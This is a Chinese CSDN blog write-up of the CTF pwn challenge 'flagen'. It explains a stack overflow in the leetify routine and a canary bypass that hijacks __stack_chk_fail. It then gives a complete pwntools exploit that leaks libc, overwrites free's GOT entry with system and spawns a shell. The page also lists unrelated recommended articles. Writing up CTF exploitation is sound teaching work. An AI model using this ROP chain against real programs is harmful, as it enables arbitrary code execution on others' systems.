flagen

最新推荐文章于 2023-05-26 08:54:00 发布
最新推荐文章于 2023-05-26 08:54:00 发布
阅读量698 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/88369423
版权

题目
提取码:g36p

ida静态分析

找到sub_80488C6()函数中存在一个漏洞点。

      case 0x48:
      case 0x68:
        v4 = v15;
        v5 = v15 + 1;
        *v4 = 0x31;
        *v5 = 0x2D;
        v6 = v5 + 1;
        v15 = v5 + 2;
        *v6 = 0x31;
        break;

这部分代码将我们输入的flag转换后会变长,存在溢出漏洞。
但仅仅有这个还不行,因为这个程序存在canary,所以我们必须要解除canary。
在这里面有个十分巧妙的地方
在这里插入图片描述
如果我们构造的payload合适的话,可以用 __stack_chk_fail的地址将参数给覆盖,从而使得我们可以控制 __stack_chk_fail,去掉检查。

然后还需要注意的就是payload中会有\x00截断,所以我们需要找到一个合适的输入函数。使用文件中自己编写的输入函数,覆盖参数(注意\x00截断)
在这里插入图片描述
exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']


elf=ELF('./flagen')

def input(p,input):
    p.sendlineafter(': ','1')
    p.sendline(input)

def up(p):
    p.sendlineafter(': ','2')

def low(p):
    p.sendlineafter(': ','3')

def change(p):
    p.sendlineafter(': ','4')

def addprefix(p):
    p.sendlineafter(': ','5')

def prin(p):
    p.sendlineafter(': ','6')

def exit(p):
    p.sendlineafter(': ','7')

puts=0x08048510
ret=0x0804846a
stack_check=0x0804B01C
pop_1=0x08048481
pop_2=0x08048b00
pop_3=0x08048d8d
bss=0x804b144+0x8
a=0x08048F60
read=0x080486CB

p=process('./flagen')
payload=p32(ret)+'h'*0x55+'a'*8+'a'*5+p32(pop_1)+p32(stack_check)
payload+=p32(puts)+p32(pop_1)+p32(elf.got['free'])
payload+=p32(read)+p32(pop_3)+p32(bss+0x100)+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(read)+p32(pop_3)+p32(elf.got['free'])+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(elf.plt['free'])+p32(pop_1)+p32(bss+0x100)
input(p,payload)
change(p)
alarm=u32(p.recv()[4:8].ljust(4,'\x00'))

libc=LibcSearcher('alarm',alarm)
system=alarm-libc.dump('alarm')+libc.dump('system')
malloc_hook=alarm-libc.dump('alarm')+libc.dump('__malloc_hook')
print('malloc_hook',hex(malloc_hook))
p.sendline('/bin/sh\x00')
p.sendline(p32(system))
p.sendline('ls')
p.interactive()
p.close()
Maxmalloc
关注
专栏目录
0ctf flagen writeup
ling
04-12 2017
溢出点: 在leetify的处理中,程序将h转化为1-1,一个字符变成了三个字符。但是空间没有增加,存在栈溢出。 利用: 程序有栈canary保护,最开始想着找方法泄露出canary。看栈上有残留的canary存在,然后就使劲找泄露方法,奈何所有的处理函数中,字符串的末尾都添加上了\x00,因此没办法泄露。 后来考虑栈溢出能覆盖些什么。栈canary、返回值、函数参数。函数的参数刚
浅谈Flag模式
灵魂里的香气
10-23 1042
讲Flag之前,先有一个概念,taskAffinity(任务栈亲和力)。taskAffinity跟Flag是配合使用的。我们在manifest清单文件中给某些activity的标签设置上这个属性,后面跟的值是包名,那么就使得这些activity在同一个任务栈中(即taskID是相同的)。1.FLAG_ACTIVITY_NEW_TASK模式(要求在不同应用中使用)1.1概念:这个标志通常会启动一个新的
[pwn]ROP:三道题讲解花式绕过Canary栈保护
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
Neepu2023-部分Reserve复现
最新发布
m0_73393932的博客
05-26 925
逆向
毕业设计实战:单片机智能温控风扇设计 带智能调速人体感应 论文仿真 源码 原理图
从零开始学单片机的博客
02-15 7823
51单片机做的温空风扇 数码管显示 带人体感应模块,实现智能调速,功能非常强大,这是一个本科的毕业设计,毕业论文 开题报告 源码 原理图 还有proteus仿真等等都是一应俱全. 还有答辩常见问题解答,焊接注意事项和调试讲解,以及详细的制作过程. 温空风扇实物图: 智能风扇仿真截图: 温空风扇的DXP格式 protel99格式 温控风扇原理图: DXP格式用 Alti...
Flat
10-24
Flat
flat
03-16
开发 yarn # renderer-app (第一个窗口,不要关闭) cd src/renderer-app yarn start # main-app (第二个窗口,不要关闭) cd src/main-app yarn start 建立 cd src/renderer-app yarn build cd ../src/main-app yarn pack:mac:auto
flag
qq_42535842的博客
12-21 182
新发现CSS真的可以做出很酷炫的效果,希望不久的自己也可以做到!
FLAG
weixin_44110537的博客
07-25 115
给了这么一张图 用stegsolve打开 分析发现藏了一个zip压缩包,以bin形式保存。 发现里面有个文件。 分析文件类型后发现是一个elf文件 在计算机科学中,是一种用于二进制文件、可执行文件、目标代码、共享库和核心转储格式文件。---------------百度百科 查看里面的可打印字符 得到答案。 ...
Flag
CZHLNN的博客
09-26 188
首先我想自我介绍一下,我是长安大学信息工程学院智能交通与信息系统工程专业的研究生,我学习编程算法和深度学习有很长一段时间了,幸运的是我对此很感兴趣,并渴望未来以此作为的工作,一年以来我每天在编程上的时间平均应该有2个小时,但是从今天起,我要每天5个小时以上在这上面,来全面提升自己,毕业后我想去北京,我非常喜欢字节跳动的企业文化,并渴望明年能够成为字节跳动的一员。 ...
ELF中PLT和GOT工作机制简介-可还原
badman250的专栏
05-03 2419
以实际的Hello World小程序为例子,作为动态库的学习材料。 开章上个图,看完明白这个图。 1.编译过程 以最简单的 Hello world为例 #include <stdio.h> int main() { printf("hello, world\n"); return 0; } ...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4297
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
初学FPGA——状态机
gouyepeng的博客
04-12 946
@[仅记录FPGA学习过程中的点点滴滴,欢迎交流与指正] 基础知识 状态机全称是有限状态机(Finite State Machine,FSM ),是一种在有限个状态之间按一定规律转换的时序电路,可以认为是组合逻辑和时序逻辑的一种组合。状态机通过控制各个状态的跳转来控制流程,使得整个代码看上去更加清晰易懂,在控制复杂流程的时候,状态机优势明显,因此基本上都会用刀状态机。 状态机功能: 描述系统逻辑功能。 定义系统的不同状态。 描述系统转化的条件及转化过程。 刻画系统状态和输入输出之间的关系。 状态机的.
很经典的一个Re题目
Mr_Corazon的博客
03-11 386
很明显encode有问题 进去看看 查看key长度是18于enflag的长度一样 查看enflag里面东西是 把这一串字符用ASCII解密出来 编写python脚本得到flag` enflag=[105, 122, 119, 104, 114, 111, 122, 34, 34, 119, 34, 118, 46, 75, 34, 46, 78, 105, 0] flag=’’ for i in range(0,18,3): flag+=chr((18^enflag[i])-6) flag+=chr.
[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持
weixin_34133829的博客
02-20 675
本题为Linux栈溢出漏洞的利用,考查Linux Canary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。 0x01 Linux Canary介绍首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的...
2021东华杯misc详解
热门推荐
Demodd的博客
11-04 5万+
前言 本次比赛还是发现了自己很多问题,希望以后能改善吧。。。 签到 +AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- utf-7编码http://toolswebtop.com/text/process/decode/UTF-7 flag{dhb_7th} project 题目附件发现是工程文件,按日期排序只有一个新的exe文件,那考点肯定就在这了 运行exe生成了一个zip 打开解压缩的文件发现有三部分编码 base64 quoted-printable base64转
攻防世界-Reverse-666(图解详细)
半岛铁盒的博客
12-03 4281
自述 这道题对于新手来说还是比较经典的,把逆向与python脚本的编写联系了起来;因为刚开始我没有学python,一遇到脚本什么的就很懵,学了半个月python后,我对做题有个更深的认识,记录一下; 解题 把文件放入IDA 找到main函数, 这一段很短却提供了很多的信息; 意思是:输入一串字符,进入encode(点进去发现是一个加密函数) 再往下走,长度与key相比较,要求长度等于key,再往下走,把加密后的字符与enflag相比较,两者相等 **一.**先点进key看看; 有两个信息 1. key
UCOSIII事件标志组
超哥的专栏
01-02 900
两种同步机制 “或”同步 “与”同步 使能#define OS_CFG_FLAG_EN 1u /* Enable (1) or Disable (0) code generation for EVENT FLAGS */主结构体typedef struct os_flag_grp OS_FLAG_GRP; struct os_flag_grp {
逐字逐句解析ucos ii 源代码-》OS_FLAG
一条狗的自我修养
02-16 2227
//BY 简单的元清 //部分内容引用了其他博主的文章,对这些博主表示感谢,时间关系就不一一指出了。 //如有转载,请说明,谢谢/* ********************************************************************************************************* * ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值